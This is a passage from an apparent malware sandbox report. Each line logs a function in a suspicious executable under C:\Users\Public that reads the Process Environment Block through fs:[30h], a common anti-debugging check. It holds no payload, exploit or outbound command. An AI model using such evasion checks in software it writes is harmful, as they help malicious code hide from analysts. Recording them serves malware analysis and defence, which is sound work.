Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013190AF mov eax, dword ptr fs:[00000030h] 29_2_013190AF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h] 29_2_012D9080
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h] 29_2_012D3880
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h] 29_2_012D3880
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01353884 mov eax, dword ptr fs:[00000030h] 29_2_01353884
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01353884 mov eax, dword ptr fs:[00000030h] 29_2_01353884
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h] 29_2_012D58EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h] 29_2_012FB8E4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h] 29_2_012FB8E4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h] 29_2_012D40E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h] 29_2_012D40E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h] 29_2_012D40E1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h] 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h] 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h] 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h] 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h] 29_2_012E28FD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h] 29_2_012E28FD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h] 29_2_012E28FD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h] 29_2_0136B8D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h] 29_2_012D70C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h] 29_2_012D70C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013918CA mov eax, dword ptr fs:[00000030h] 29_2_013918CA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h] 29_2_012D78D6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h] 29_2_012D78D6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h] 29_2_012D78D6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h] 29_2_0139B0C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h] 29_2_0139B0C7
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139131B mov eax, dword ptr fs:[00000030h] 29_2_0139131B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h] 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h] 29_2_01303B7A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h] 29_2_01303B7A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h] 29_2_012DDB60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01366365 mov eax, dword ptr fs:[00000030h] 29_2_01366365
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01366365 mov eax, dword ptr fs:[00000030h] 29_2_01366365
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01366365 mov eax, dword ptr fs:[00000030h] 29_2_01366365
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h] 29_2_012D7B70
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h] 29_2_012EF370
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h] 29_2_012EF370
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h] 29_2_012EF370
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h] 29_2_013A8B58
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h] 29_2_01303B5A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h] 29_2_01303B5A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h] 29_2_01303B5A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h] 29_2_01303B5A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h] 29_2_012DDB40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h] 29_2_012DF358
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h] 29_2_013A9BBE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h] 29_2_013A8BB6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h] 29_2_01391BA8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h] 29_2_01304BAD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h] 29_2_01304BAD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h] 29_2_01304BAD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h] 29_2_013A5BA5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h] 29_2_0130B390
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h] 29_2_012E1B8F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h] 29_2_012E1B8F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302397 mov eax, dword ptr fs:[00000030h] 29_2_01302397
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139138A mov eax, dword ptr fs:[00000030h] 29_2_0139138A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h] 29_2_012FEB9A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h] 29_2_012FEB9A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h] 29_2_0138D380
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h] 29_2_012D4B94
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B mov eax, dword ptr fs:[00000030h] 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B mov eax, dword ptr fs:[00000030h] 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B mov eax, dword ptr fs:[00000030h] 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h] 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h] 29_2_012D1BE9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h] 29_2_012FDBE9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h] 29_2_013003E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h] 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h] 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h] 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h] 29_2_013053C5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013553CA mov eax, dword ptr fs:[00000030h] 29_2_013553CA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013553CA mov eax, dword ptr fs:[00000030h] 29_2_013553CA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h] 29_2_012FA229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h] 29_2_012D4A20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h] 29_2_012D4A20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391229 mov eax, dword ptr fs:[00000030h] 29_2_01391229
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h] 29_2_012D8239
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h] 29_2_012D8239
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h] 29_2_012D8239
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h] 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h] 29_2_01314A2C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h] 29_2_01314A2C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h] 29_2_012E8A0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h] 29_2_012EBA00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h] 29_2_0139AA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h] 29_2_0139AA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h] 29_2_012F3A1C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h] 29_2_012DAA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h] 29_2_012DAA16
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h] 29_2_012D5210
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131927A mov eax, dword ptr fs:[00000030h] 29_2_0131927A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h] 29_2_0138B260
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h] 29_2_0138B260
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h] 29_2_013A8A62
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h] 29_2_01315A69
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01364257 mov eax, dword ptr fs:[00000030h] 29_2_01364257
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h] 29_2_01391A5F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h] 29_2_0139EA55
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h] 29_2_0130FAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h] 29_2_012D1AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov esi, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov eax, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov eax, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h] 29_2_01305AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h] 29_2_01305AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h] 29_2_012EAAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h] 29_2_012EAAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139129A mov eax, dword ptr fs:[00000030h] 29_2_0139129A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h] 29_2_0130D294
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h] 29_2_0130D294
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h] 29_2_0130DA88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h] 29_2_0130DA88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h] 29_2_01302AE4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h] 29_2_012D3ACA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h] 29_2_013A8ADD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h] 29_2_012D12D4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h] 29_2_01302ACB
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h] 29_2_0139E539
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h] 29_2_0135A537
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8D34 mov eax, dword ptr fs:[00000030h] 29_2_013A8D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
